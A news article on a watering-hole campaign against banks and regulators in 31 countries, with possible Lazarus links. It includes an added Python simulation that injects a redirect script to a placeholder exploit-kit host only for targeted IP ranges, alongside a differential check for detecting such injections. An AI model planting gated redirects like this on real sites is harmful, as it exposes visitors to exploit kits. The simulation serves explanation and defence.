Attackers have targeted bank regulators and state-owned banks in more than 30 countries, researchers from Symantec and BAE Systems said over the weekend, using a watering hole technique that redirects users to a site exploiting flaws in Silverlight and Flash Player.
The malware attacks that recently put Polish banks on alert were actually part of a wider campaign targeting financial organizations in more than 30 countries. Security researchers from Symantec and BAE Systems linked the malware to similar attacks that have taken place since October 2016 in other regions. There are also similarities to tools previously used by a group of attackers known in the security industry as Lazarus.
The attackers compromised websites chosen for their appeal to the intended victims, the so-called “watering hole” technique. Rather than luring victims to an attacker-controlled site, it involves planting code on a legitimate site the targets already visit. The code injected into the site redirects visitors to a specific exploit kit containing exploits for flaws in Silverlight and Flash Player. The redirect only fires for visitors whose IP addresses are on the attackers' list. “These IP addresses belong to 104 different organizations located in 31 countries,” Symantec researchers explain in a post published on February 12. “The vast majority are banks, plus a few telecommunications and Internet players.”
In the case of the Polish banks, the malicious code is suspected to have been hosted on the website of the Polish Financial Supervision Authority, the government regulator of the banking sector. BAE Systems researchers found evidence that, in November, similar code pointing to the same exploit kit was present on the website of the National Bank of Mexico, the Mexican counterpart of the Polish Financial Supervision Authority. The same code was also found on the website of Banco de la República Oriental del Uruguay, Uruguay's largest state-owned bank, according to BAE Systems. The list of targeted IP addresses included those of 19 organizations located in Poland, 15 in the United States, 9 in Mexico, 7 in the United Kingdom and 6 in Chile.
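The IP-gating described above is what makes such injections hard to spot: a scanner or analyst connecting from an address outside the target list gets a clean page. The following Python simulation, added here as an illustration and not code from the Symantec or BAE Systems reports, models a compromised server that injects the redirect only for listed addresses, and shows the differential check a defender can use against it: fetch the same page from inside the suspected target range and from an unrelated address, then diff the scripts. All networks, hostnames and page content are constructed for the example; the real injected script is not reproduced.

```python
"""Simulation of an IP-gated watering-hole redirect and a differential check
that exposes it. Constructed example; not code from the Symantec or BAE
Systems reports. All IP ranges, hostnames and HTML below are hypothetical."""
import ipaddress
import re

# Hypothetical target list. The real campaign gated on a fixed list of
# addresses; these RFC 5737 documentation ranges stand in for two banks.
TARGET_NETWORKS = [
    ipaddress.ip_network("198.51.100.0/24"),   # TEST-NET-2, "bank A"
    ipaddress.ip_network("203.0.113.64/27"),   # TEST-NET-3, "bank B"
]

# Hypothetical exploit-kit landing page the injected script redirects to.
EXPLOIT_KIT_URL = "https://ek.example.invalid/landing"

CLEAN_PAGE = """<html><head><title>Regulator</title>
<script src="/static/site.js"></script></head>
<body><h1>Financial Supervision Authority</h1></body></html>"""

# The injected element: an inline script that sends the browser to the kit.
INJECTED_TAG = f'<script>window.location="{EXPLOIT_KIT_URL}";</script>'


def is_target(visitor_ip: str) -> bool:
    """True if the visitor's address falls inside any targeted network."""
    addr = ipaddress.ip_address(visitor_ip)
    return any(addr in net for net in TARGET_NETWORKS)


def serve_page(visitor_ip: str) -> str:
    """Model of the compromised server: the redirect is injected only for
    listed addresses, so casual visitors and most scanners see a clean page."""
    if is_target(visitor_ip):
        return CLEAN_PAGE.replace("</head>", INJECTED_TAG + "</head>")
    return CLEAN_PAGE


SCRIPT_RE = re.compile(r"<script[^>]*>.*?</script>", re.S)


def extract_scripts(html: str) -> list[str]:
    """Pull every <script> element out of a page, inline or external."""
    return SCRIPT_RE.findall(html)


def differential_check(page_from_target: str, page_from_outside: str) -> list[str]:
    """Defender's check: the same URL fetched from inside the suspected target
    range and from an unrelated address. Scripts present only in the first
    response are candidates for an IP-gated injection."""
    outside = set(extract_scripts(page_from_outside))
    return [s for s in extract_scripts(page_from_target) if s not in outside]


def redirect_destinations(scripts: list[str]) -> list[str]:
    """Extract the URL from simple location-assignment redirects so the
    destination can be blocked or handed to incident response."""
    dests = []
    for s in scripts:
        m = re.search(r'location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', s)
        if m:
            dests.append(m.group(1))
    return dests


if __name__ == "__main__":
    from_target = serve_page("198.51.100.25")   # inside "bank A"
    from_outside = serve_page("192.0.2.10")     # TEST-NET-1, not on the list
    extra = differential_check(from_target, from_outside)
    print("scripts served only to the target:", extra)
    print("redirect destinations:", redirect_destinations(extra))
```

In practice the "inside" fetch is made from the organisation's own egress address (or a proxy on its network) and the "outside" fetch from an unrelated one; in this simulation both are just calls to `serve_page`. A clean diff does not prove the site is safe, since the gate may also key on other request attributes, but a non-empty diff on a site that should serve identical content to everyone is a strong signal.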
France is not among the countries listed by Symantec in its post (above).
Malware dubbed Downloader.Ratankba
The payload delivered by the exploits is previously unknown malware that Symantec has named Downloader.Ratankba. It downloads a second malicious program that gathers information about the compromised system. The code of this second tool shares similarities with malware previously used by the Lazarus group, which has been active since 2009 and has frequently attacked targets in the United States and South Korea, Symantec notes. The group is also suspected of involvement in the theft of $81 million from the Bangladesh central bank last year; in that attack, malware was used to manipulate the bank's computers that send transfer orders over the SWIFT interbank messaging network.
“The technical evidence for linking the Lazarus group…to ‘waterhole’ activity is unclear,” BAE Systems researchers note in a post published over the weekend. However, they add, the choice of banking regulators and state-owned banks could be a clue: the group's previous robberies targeted central banks, even if that has not really helped it to infiltrate the wider banking sector.